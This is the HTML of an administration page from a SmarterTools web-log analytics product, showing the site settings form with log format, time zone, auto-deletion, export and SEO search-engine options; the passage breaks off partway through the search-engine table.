<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script src="/WebResource.axd?d=tmbPiP2D38VVojyjJVsEkXwe8X4rw_c60mStWfistR8pyJPOf4ElR79y8d6v9XE45y9Xuon7XBs01GFx3aJPBQ4-yv7YCKPFvc37E1RidaE1&amp;t=634219308989960000" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1','','tctl00$TPH$UpdatePanel1','','tctl00$MPH$UpdatePanel5','','tctl00$MPH$UpdatePanel3',''], ['ctl00$BPH$btnSave','','ctl00$BPH$btnEdit','','ctl00$MPH$btnRefresh','','ctl00$BPH$mnu1','','ctl00$MPH$btnUpdateIISImport','','ctl00$BPH$btnDelete',''], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       Sites
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
   <div id="ctl00_BPH_btnSave" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnSave',''); return false;"><span class="BBInner">Save</span></a></div>
   
<!-- HyperMenu -->
<div class='hmMenuBar'><ul class='hmMenu hmMenuBar hmList' id='ctl00_BPH_mnu1' name='ctl00$BPH$mnu1' style='z-index:800'>
   <li class='hmItem hmFirst' id='ctl00_BPH_mnu1_btnImport' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>Import<span class='hmArrow'></span></a>
   <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
       <li class='hmItem hmFirst hmLast' id='ctl00_BPH_mnu1_btnImport_btnImportIIS' style='z-index: 800'><a class='hmA' href='#'>From IIS</a></li>
   </ul><div class='hmScrollDown'></div></div>
   </li>
   <li class='hmItem hmLast' id='ctl00_BPH_mnu1_btnAdd' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>Add<span class='hmArrow'></span></a>
   <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
       <li class='hmItem hmFirst hmLast' id='ctl00_BPH_mnu1_btnAdd_btnAddLogLocation' style='z-index: 800'><a class='hmA' href='#'>Log Location</a></li>
   </ul><div class='hmScrollDown'></div></div>
   </li>
</ul>
</div>

   <span id="logLocationButtons" style="display: none">
       <div id="ctl00_BPH_btnEdit" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnEdit',''); return false;"><span class="BBInner">Edit</span></a></div>
       <div id="ctl00_BPH_btnDelete" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_btnDelete(); return false;"><span class="BBInner">Delete</span></a></div>
   </span>

           </div>
           <div class="ButtonBarRight">
               
   <div id="ctl00_BrPH_btnCancel" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="DoPopupWindowClose();; return false;"><span class="BBInner">Cancel</span></a></div>

           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               <div id="ctl00_TipTextDiv" class="TipTextContainer">
                   <div class="TipTextFailure">You have reached the maximum number of sites that your license allows. Please contact <a href='http://www.smartertools.com' target='_new'>www.smartertools.com</a> to learn how to increase the number of sites you can run concurrently.</div>
               </div>
           </span>
       <div id="ctl00_trTabStrip" class="TabStripContainer">
           
   <div id="ctl00_TPH_UpdatePanel1">
   
           
<!-- HyperTabStrip -->
   <div class='htsTabStrip htsTabBar'><ul id='ctl00_TPH_HyperTabStrip1'>
       <li class='htsItem htsFirst htsSelected' id='ctl00_TPH_HyperTabStrip1_HyperTabItem1'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Options</span></span></a></li>
       <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem2'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Log Options</span></span></a></li>
       <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem3'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Log Locations</span></span></a></li>
       <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem5'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>SEO Options</span></span></a></li>
   </ul>
   <input type="hidden" name="ctl00$TPH$HyperTabStrip1$SelectedTab" id="ctl00_TPH_HyperTabStrip1_SelectedTab" value="ctl00_TPH_HyperTabStrip1_HyperTabItem1" /><div class='htsClear'><div class='ie6fix'>&nbsp;</div></div></div>
   
       
</div>

       </div>
       <div id="Scrollable" class="ContentDiv">
           
   
<div id="ConfirmWindow" class="ConfirmWindow" style="display: none">
   <div id="DivConfirmContent" class="ConfirmContent">
       <div class="ConfirmNote" id="ConfirmText">
           &nbsp;
       </div>
   </div>
   <div id="ctl00_MPH_AP1_Button" class="PopupButtons">
       <div class="ButtonBarRight">
           <span id="CancelButtonWrapper">
               <div id="ctl00_MPH_AP1_CancelButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="CancelPopup();; return false;"><span class="BBInner">Cancel</span></a></div>
           </span>
           <div id="ctl00_MPH_AP1_SaveButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="OKPopup();; return false;"><span class="BBInner">OK</span></a></div>
       </div>
   </div>
   <span id="MessageHeaderText" style="display: none">
       Message</span>
   <input style="position: absolute; top: -1000px;" id="DeleteKeyCaptureBox" />

   <script type="text/javascript">
       function GetConfirmTitle() {
           return $('#MessageHeaderText').html();
       }
       function ShowAlert(errorMessage) {
           $('#CancelButtonWrapper').css('display', 'none');
           $('#ConfirmText').html(errorMessage).css('display', '');
       }
       function ShowConfirm(type, size) {
           var displayText = confirmationDialogKeys[type];
           if (displayText == undefined) displayText = type;
           $('#CancelButtonWrapper').css('display', '');
           $('#ConfirmText').html(displayText.replace(/\{0\}/g, size.toString()));
           $('#DeleteConfirmCount').html(size.toString());
       }
       function CancelPopup() {
           parent.ConfirmCallback(false);
           ClosePopup();
       }
       function OKPopup() {
           parent.ConfirmCallback(true);
           ClosePopup();
       }
       $('#DeleteKeyCaptureBox').live('keydown', function(evt) {
           CancelEvent(evt);
           if ($('#ConfirmWindowModal').attr('display') == 'none') return;
           if (evt.keyCode == 13 || evt.which == 13) OKPopup();
           else if (evt.keyCode == 27 || evt.which == 27) CancelPopup();
           return false;
       });
   </script>

</div>

   <div id="ctl00_MPH_UpdatePanel5">
   
           
           <a id="ctl00_MPH_btnUpdateIISImport" href="javascript:__doPostBack(&#39;ctl00$MPH$btnUpdateIISImport&#39;,&#39;&#39;)" style="display: none"></a>
           <a id="ctl00_MPH_btnRefresh" href="javascript:__doPostBack(&#39;ctl00$MPH$btnRefresh&#39;,&#39;&#39;)" style="display: none"></a>
           
<!-- HyperMultiPage -->
   <div class='' id='ctl00_MPH_MP1'>
       <input type="hidden" name="ctl00$MPH$VisiblePage" id="ctl00_MPH_VisiblePage" value="ctl00_MPH_OptionsTab" />
               <div id='ctl00_MPH_OptionsTab' class='' >
           <span id="ctl00_MPH_OptionsTab">
                   <table id="ctl00_MPH_tblAdminMain" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_txtDomainName">
                   <td id="ctl00_MPH_txtDomainName_Label" class="Indent Fixed">Site Name</td><td id="ctl00_MPH_txtDomainName_Setting" class="Setting"><input name="ctl00$MPH$txtDomainName_SettingText" type="text" size="50" id="ctl00_MPH_txtDomainName_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_txtDomainUrl">
                   <td id="ctl00_MPH_txtDomainUrl_Label" class="Indent Fixed">Site Url</td><td id="ctl00_MPH_txtDomainUrl_Setting" class="Setting"><input name="ctl00$MPH$txtDomainUrl_SettingText" type="text" size="50" id="ctl00_MPH_txtDomainUrl_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_txtSiteId">
                   <td id="ctl00_MPH_txtSiteId_Label" class="Indent Fixed">Site ID</td><td id="ctl00_MPH_txtSiteId_Setting" class="Setting"><input name="ctl00$MPH$txtSiteId_SettingText" type="text" value="2" size="3" id="ctl00_MPH_txtSiteId_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_lstServer">
                   <td id="ctl00_MPH_lstServer_Label" class="Indent Fixed">Server</td><td id="ctl00_MPH_lstServer_Setting" class="Setting"><select name="ctl00$MPH$lstServer_SettingDropDown" id="ctl00_MPH_lstServer_SettingDropDown">
                       <option selected="selected" value="1">localhost</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_lstStatus">
                   <td id="ctl00_MPH_lstStatus_Label" class="Indent Fixed">Current State</td><td id="ctl00_MPH_lstStatus_Setting" class="Setting"><select name="ctl00$MPH$lstStatus_SettingDropDown" id="ctl00_MPH_lstStatus_SettingDropDown">
                       <option selected="selected" value="start">Started</option>
                       <option value="paused">Paused</option>
                       <option value="disabled">Disabled</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_exSettingSmarterLogs">
                   <td id="ctl00_MPH_exSettingSmarterLogs_Label" class="Indent Fixed">SmarterLog Path</td><td class=" Setting"><input name="ctl00$MPH$txtSmarterLogDirectory" type="text" value="C:\SmarterLogs\" size="40" id="ctl00_MPH_txtSmarterLogDirectory" />
                               <input type="button" value="Browse" onclick="SmarterLogBrowse()" />
                           </td>
               </tr><tr id="ctl00_MPH_lstTimeZone">
                   <td id="ctl00_MPH_lstTimeZone_Label" class="Indent Fixed">Time Zone</td><td id="ctl00_MPH_lstTimeZone_Setting" class="Setting"><select name="ctl00$MPH$lstTimeZone_SettingDropDown" id="ctl00_MPH_lstTimeZone_SettingDropDown">
                       <option value="0">(GMT-12:00) International Date Line West</option>
                       <option value="1">(GMT-11:00) Midway Island, Samoa</option>
                       <option value="2">(GMT-10:00) Hawaii</option>
                       <option value="3">(GMT-09:00) Alaska</option>
                       <option value="-2147483579">(GMT-08:00) Tijuana, Baja California</option>
                       <option value="4">(GMT-08:00) Pacific Time (US &amp; Canada)</option>
                       <option value="-2147483580">(GMT-07:00) Chihuahua, La Paz, Mazatlan - New</option>
                       <option value="10">(GMT-07:00) Mountain Time (US &amp; Canada)</option>
                       <option value="15">(GMT-07:00) Arizona</option>
                       <option value="13">(GMT-07:00) Chihuahua, La Paz, Mazatlan - Old</option>
                       <option value="25">(GMT-06:00) Saskatchewan</option>
                       <option value="30">(GMT-06:00) Guadalajara, Mexico City, Monterrey - Old</option>
                       <option selected="selected" value="20">(GMT-06:00) Central Time (US &amp; Canada)</option>
                       <option value="-2147483581">(GMT-06:00) Guadalajara, Mexico City, Monterrey - New</option>
                       <option value="33">(GMT-06:00) Central America</option>
                       <option value="35">(GMT-05:00) Eastern Time (US &amp; Canada)</option>
                       <option value="40">(GMT-05:00) Indiana (East)</option>
                       <option value="45">(GMT-05:00) Bogota, Lima, Quito, Rio Branco</option>
                       <option value="-2147483573">(GMT-04:30) Caracas</option>
                       <option value="-2147483576">(GMT-04:00) Manaus</option>
                       <option value="50">(GMT-04:00) Atlantic Time (Canada)</option>
                       <option value="55">(GMT-04:00) La Paz</option>
                       <option value="56">(GMT-04:00) Santiago</option>
                       <option value="60">(GMT-03:30) Newfoundland</option>
                       <option value="70">(GMT-03:00) Buenos Aires, Georgetown</option>
                       <option value="73">(GMT-03:00) Greenland</option>
                       <option value="65">(GMT-03:00) Brasilia</option>
                       <option value="-2147483575">(GMT-03:00) Montevideo</option>
                       <option value="75">(GMT-02:00) Mid-Atlantic</option>
                       <option value="80">(GMT-01:00) Azores</option>
                       <option value="83">(GMT-01:00) Cape Verde Is.</option>
                       <option value="90">(GMT) Casablanca, Monrovia, Reykjavik</option>
                       <option value="85">(GMT) Greenwich Mean Time : Dublin, Edinburgh, Lisbon, London</option>
                       <option value="95">(GMT+01:00) Belgrade, Bratislava, Budapest, Ljubljana, Prague</option>
                       <option value="100">(GMT+01:00) Sarajevo, Skopje, Warsaw, Zagreb</option>
                       <option value="105">(GMT+01:00) Brussels, Copenhagen, Madrid, Paris</option>
                       <option value="110">(GMT+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna</option>
                       <option value="113">(GMT+01:00) West Central Africa</option>
                       <option value="130">(GMT+02:00) Athens, Bucharest, Istanbul</option>
                       <option value="-2147483583">(GMT+02:00) Beirut</option>
                       <option value="-2147483582">(GMT+02:00) Amman</option>
                       <option value="135">(GMT+02:00) Jerusalem</option>
                       <option value="-2147483578">(GMT+02:00) Windhoek</option>
                       <option value="125">(GMT+02:00) Helsinki, Kyiv, Riga, Sofia, Tallinn, Vilnius</option>
                       <option value="140">(GMT+02:00) Harare, Pretoria</option>
                       <option value="115">(GMT+02:00) Minsk</option>
                       <option value="120">(GMT+02:00) Cairo</option>
                       <option value="155">(GMT+03:00) Nairobi</option>
                       <option value="145">(GMT+03:00) Moscow, St. Petersburg, Volgograd</option>
                       <option value="150">(GMT+03:00) Kuwait, Riyadh</option>
                       <option value="158">(GMT+03:00) Baghdad</option>
                       <option value="-2147483577">(GMT+03:00) Tbilisi</option>
                       <option value="160">(GMT+03:30) Tehran</option>
                       <option value="165">(GMT+04:00) Abu Dhabi, Muscat</option>
                       <option value="170">(GMT+04:00) Caucasus Standard Time</option>
                       <option value="-2147483584">(GMT+04:00) Baku</option>
                       <option value="-2147483574">(GMT+04:00) Yerevan</option>
                       <option value="175">(GMT+04:30) Kabul</option>
                       <option value="180">(GMT+05:00) Ekaterinburg</option>
                       <option value="185">(GMT+05:00) Islamabad, Karachi, Tashkent</option>
                       <option value="200">(GMT+05:30) Sri Jayawardenepura</option>
                       <option value="190">(GMT+05:30) Chennai, Kolkata, Mumbai, New Delhi</option>
                       <option value="193">(GMT+05:45) Kathmandu</option>
                       <option value="201">(GMT+06:00) Almaty, Novosibirsk</option>
                       <option value="195">(GMT+06:00) Astana, Dhaka</option>
                       <option value="203">(GMT+06:30) Yangon (Rangoon)</option>
                       <option value="207">(GMT+07:00) Krasnoyarsk</option>
                       <option value="205">(GMT+07:00) Bangkok, Hanoi, Jakarta</option>
                       <option value="225">(GMT+08:00) Perth</option>
                       <option value="210">(GMT+08:00) Beijing, Chongqing, Hong Kong, Urumqi</option>
                       <option value="227">(GMT+08:00) Irkutsk, Ulaan Bataar</option>
                       <option value="220">(GMT+08:00) Taipei</option>
                       <option value="215">(GMT+08:00) Kuala Lumpur, Singapore</option>
                       <option value="240">(GMT+09:00) Yakutsk</option>
                       <option value="230">(GMT+09:00) Seoul</option>
                       <option value="235">(GMT+09:00) Osaka, Sapporo, Tokyo</option>
                       <option value="250">(GMT+09:30) Adelaide</option>
                       <option value="245">(GMT+09:30) Darwin</option>
                       <option value="275">(GMT+10:00) Guam, Port Moresby</option>
                       <option value="255">(GMT+10:00) Canberra, Melbourne, Sydney</option>
                       <option value="270">(GMT+10:00) Vladivostok</option>
                       <option value="260">(GMT+10:00) Brisbane</option>
                       <option value="265">(GMT+10:00) Hobart</option>
                       <option value="280">(GMT+11:00) Magadan, Solomon Is., New Caledonia</option>
                       <option value="285">(GMT+12:00) Fiji, Kamchatka, Marshall Is.</option>
                       <option value="290">(GMT+12:00) Auckland, Wellington</option>
                       <option value="300">(GMT+13:00) Nuku&#39;alofa</option>

                   </select></td>
               </tr>
           </table>
                   <table id="ctl00_MPH_tblAdminCreate" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_txtAdminNewUserName">
                   <td id="ctl00_MPH_txtAdminNewUserName_Label" class="Indent Fixed">Site Admin Username</td><td id="ctl00_MPH_txtAdminNewUserName_Setting" class="Setting"><input name="ctl00$MPH$txtAdminNewUserName_SettingText" type="text" id="ctl00_MPH_txtAdminNewUserName_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_txtAdminNewPassword">
                   <td id="ctl00_MPH_txtAdminNewPassword_Label" class="Indent Fixed">Site Admin Password</td><td id="ctl00_MPH_txtAdminNewPassword_Setting" class="Setting"><input name="ctl00$MPH$txtAdminNewPassword_SettingText" type="password" id="ctl00_MPH_txtAdminNewPassword_SettingText" class="text" autocomplete="off" /></td>
               </tr>
           </table>
                   <table id="ctl00_MPH_SettingsContainer5" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_chkSeoEnabled">
                   <td id="ctl00_MPH_chkSeoEnabled_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkSeoEnabled_Setting" class="Setting"><input id="ctl00_MPH_chkSeoEnabled_SettingCheck" type="checkbox" name="ctl00$MPH$chkSeoEnabled_SettingCheck" checked="checked" onclick="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$MPH$chkSeoEnabled_SettingCheck\&#39;,\&#39;\&#39;)&#39;, 0)" /><label for="ctl00_MPH_chkSeoEnabled_SettingCheck">Enable SEO</label></td>
               </tr>
           </table>
               </span></div>
       
               <div id='ctl00_MPH_LogOptionsTab' class='' style='display:none'>
           <span id="ctl00_MPH_LogOptionsTab">
                   <table id="ctl00_MPH_SettingsContainer2" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_lstLogLocation">
                   <td id="ctl00_MPH_lstLogLocation_Label" class="Indent Fixed">Log Location</td><td id="ctl00_MPH_lstLogLocation_Setting" class="Setting"><select name="ctl00$MPH$lstLogLocation_SettingDropDown" onchange="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$MPH$lstLogLocation_SettingDropDown\&#39;,\&#39;\&#39;)&#39;, 0)" id="ctl00_MPH_lstLogLocation_SettingDropDown">
                       <option selected="selected" value="Local">Local Path or UNC Path</option>
                       <option value="FTP">FTP</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_lstLogFormat">
                   <td id="ctl00_MPH_lstLogFormat_Label" class="Indent Fixed">Log Format</td><td id="ctl00_MPH_lstLogFormat_Setting" class="Setting"><select name="ctl00$MPH$lstLogFormat_SettingDropDown" id="ctl00_MPH_lstLogFormat_SettingDropDown">
                       <option selected="selected" value="auto">Auto-Detect</option>
                       <option value="W3Cex">IIS - W3Cex Log Format</option>
                       <option value="IIS">IIS - Microsoft IIS Log Format</option>
                       <option value="NCSA">IIS - NCSA Common Log Format</option>
                       <option value="ApacheCLF">Apache - Common Log Format</option>
                       <option value="ApacheNCSAEx">Apache - NCSA Extended Log Format</option>
                       <option value="IPlanetCLF">IPlanet - Common Log Format</option>
                       <option value="CLF">Other - Common Log Format</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_lstMonthsToKeepSmStats">
                   <td id="ctl00_MPH_lstMonthsToKeepSmStats_Label" class="Indent Fixed">Auto-Deletion</td><td id="ctl00_MPH_lstMonthsToKeepSmStats_Setting" class="Setting"><select name="ctl00$MPH$lstMonthsToKeepSmStats_SettingDropDown" id="ctl00_MPH_lstMonthsToKeepSmStats_SettingDropDown">
                       <option selected="selected" value="0">Never Delete</option>
                       <option value="1">Delete after 1 months</option>
                       <option value="2">Delete after 2 months</option>
                       <option value="3">Delete after 3 months</option>
                       <option value="4">Delete after 4 months</option>
                       <option value="5">Delete after 5 months</option>
                       <option value="6">Delete after 6 months</option>
                       <option value="7">Delete after 7 months</option>
                       <option value="8">Delete after 8 months</option>
                       <option value="9">Delete after 9 months</option>
                       <option value="10">Delete after 10 months</option>
                       <option value="11">Delete after 11 months</option>
                       <option value="12">Delete after 12 months</option>
                       <option value="13">Delete after 13 months</option>
                       <option value="14">Delete after 14 months</option>
                       <option value="15">Delete after 15 months</option>
                       <option value="16">Delete after 16 months</option>
                       <option value="17">Delete after 17 months</option>
                       <option value="18">Delete after 18 months</option>
                       <option value="19">Delete after 19 months</option>
                       <option value="20">Delete after 20 months</option>
                       <option value="21">Delete after 21 months</option>
                       <option value="22">Delete after 22 months</option>
                       <option value="23">Delete after 23 months</option>
                       <option value="24">Delete after 24 months</option>
                       <option value="25">Delete after 25 months</option>
                       <option value="26">Delete after 26 months</option>
                       <option value="27">Delete after 27 months</option>
                       <option value="28">Delete after 28 months</option>
                       <option value="29">Delete after 29 months</option>
                       <option value="30">Delete after 30 months</option>
                       <option value="31">Delete after 31 months</option>
                       <option value="32">Delete after 32 months</option>
                       <option value="33">Delete after 33 months</option>
                       <option value="34">Delete after 34 months</option>
                       <option value="35">Delete after 35 months</option>
                       <option value="36">Delete after 36 months</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_ExtensibleSetting1">
                   <td id="ctl00_MPH_ExtensibleSetting1_Label" class="Indent Fixed">Export Directory</td><td class=" Setting"><input name="ctl00$MPH$txtExportLogDirectory" type="text" size="40" id="ctl00_MPH_txtExportLogDirectory" />
                               <input type="button" value="Browse" onclick="ExportLogBrowse()" />
                           </td>
               </tr><tr id="ctl00_MPH_txtLogFileExportLocURL">
                   <td id="ctl00_MPH_txtLogFileExportLocURL_Label" class="Indent Fixed">Export Url</td><td id="ctl00_MPH_txtLogFileExportLocURL_Setting" class="Setting"><input name="ctl00$MPH$txtLogFileExportLocURL_SettingText" type="text" size="40" id="ctl00_MPH_txtLogFileExportLocURL_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_chkStripAfterSemi">
                   <td id="ctl00_MPH_chkStripAfterSemi_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkStripAfterSemi_Setting" class="Setting"><input id="ctl00_MPH_chkStripAfterSemi_SettingCheck" type="checkbox" name="ctl00$MPH$chkStripAfterSemi_SettingCheck" /><label for="ctl00_MPH_chkStripAfterSemi_SettingCheck">Enable removal of URL items after semicolon (used for jsessionid)</label></td>
               </tr><tr id="ctl00_MPH_txtDefaultDocuments">
                   <td id="ctl00_MPH_txtDefaultDocuments_Setting" class="Indent Setting" colspan="2"><span class='Label'>Default Documents (one per line)<br /></span><textarea name="ctl00$MPH$txtDefaultDocuments_SettingText" rows="4" cols="50" id="ctl00_MPH_txtDefaultDocuments_SettingText" class="text">
index.htm
index.html
default.asp
default.aspx</textarea></td>
               </tr>
           </table>
               </span></div>
       
               <div id='ctl00_MPH_LogLocationsTab' class='' style='display:none'>
           <span id="ctl00_MPH_LogLocationsTab">
                   <span id="ctl00_MPH_ctxLogLocations">
<!-- HyperMenu -->
           <div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl02' name='ctl00$MPH$ctl02' style='z-index:800'>
               <li class='hmItem hmFirst' id='ctl00_MPH_ctl02_hm0' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>Add<span class='hmArrow'></span></a>
               <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
                   <li class='hmItem hmFirst hmLast' id='ctl00_MPH_ctl02_hm0_hm0' style='z-index: 800'><a class='hmA' href='#'>Log Location</a></li>
               </ul><div class='hmScrollDown'></div></div>
               </li>
               <li class='hmItem' id='ctl00_MPH_ctl02_hm1' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
               <li class='hmItem hmLast' id='ctl00_MPH_ctl02_hm2' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
           </ul>
           <div class='hmScrollDown'></div></div>
           </div>
           </span>
                   <div id="ctl00_MPH_UpdatePanel3">
               
                           
<div class="HyperGridWrapper" id="ctl00_MPH_grdLogLocations">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_grdLogLocations_Table"><tr><td class="NoItems" colspan="2">There are no items to show in this list</td></tr>
</table>
<input type="hidden" name="ctl00_MPH_grdLogLocations_HiddenInput" id="ctl00_MPH_grdLogLocations_HiddenInput" value="" /><input type="hidden" name="ctl00_MPH_grdLogLocations_HiddenLSR" id="ctl00_MPH_grdLogLocations_HiddenLSR" value="" />
</div>
</div>

                       
           </div>
               </span></div>
       
               <div id='ctl00_MPH_LogFTPTab' class='' style='display:none'>
           <span id="ctl00_MPH_LogFTPTab">
                   
               </span></div>
       
               <div id='ctl00_MPH_SeoOptionsTab' class='' style='display:none'>
           <span id="ctl00_MPH_SeoOptionsTab">
                   <table id="ctl00_MPH_ucSiteSeoSettings_tblSEO" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxKeywords">
                   <td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxKeywords_Label" class="Indent Fixed">Max Keywords</td><td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxKeywords_Setting" class="Setting"><input name="ctl00$MPH$ucSiteSeoSettings$txtSeoMaxKeywords_SettingText" type="text" value="5" size="3" id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxKeywords_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxCompetitors">
                   <td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxCompetitors_Label" class="Indent Fixed">Max Competitors</td><td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxCompetitors_Setting" class="Setting"><input name="ctl00$MPH$ucSiteSeoSettings$txtSeoMaxCompetitors_SettingText" type="text" value="5" size="3" id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxCompetitors_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxRanking">
                   <td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxRanking_Label" class="Indent Fixed">Max Position to Retrieve</td><td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxRanking_Setting" class="Setting"><input name="ctl00$MPH$ucSiteSeoSettings$txtSeoMaxRanking_SettingText" type="text" value="100" size="3" id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxRanking_SettingText" class="text" /></td>
               </tr>
           </table>
                   <table id="ctl00_MPH_ucSiteSeoSearchEngineSettings_tblSeoSearchEngines" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines">
                   <td id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_Label" class="Indent Fixed">Search Engines</td><td id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_Setting" class="Setting"><table id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox" class="CheckboxList" border="0">
                       <tr>
                           <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_0" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$0" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_0">Google</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_8" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$8" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_8">Google (DE)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_15" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$15" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_15">Google (JP)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_1" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$1" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_1">Yahoo</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_9" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$9" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_9">Google (ES)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_16" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$16" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_16">Google (KR)</label></td>
                       </tr><tr>
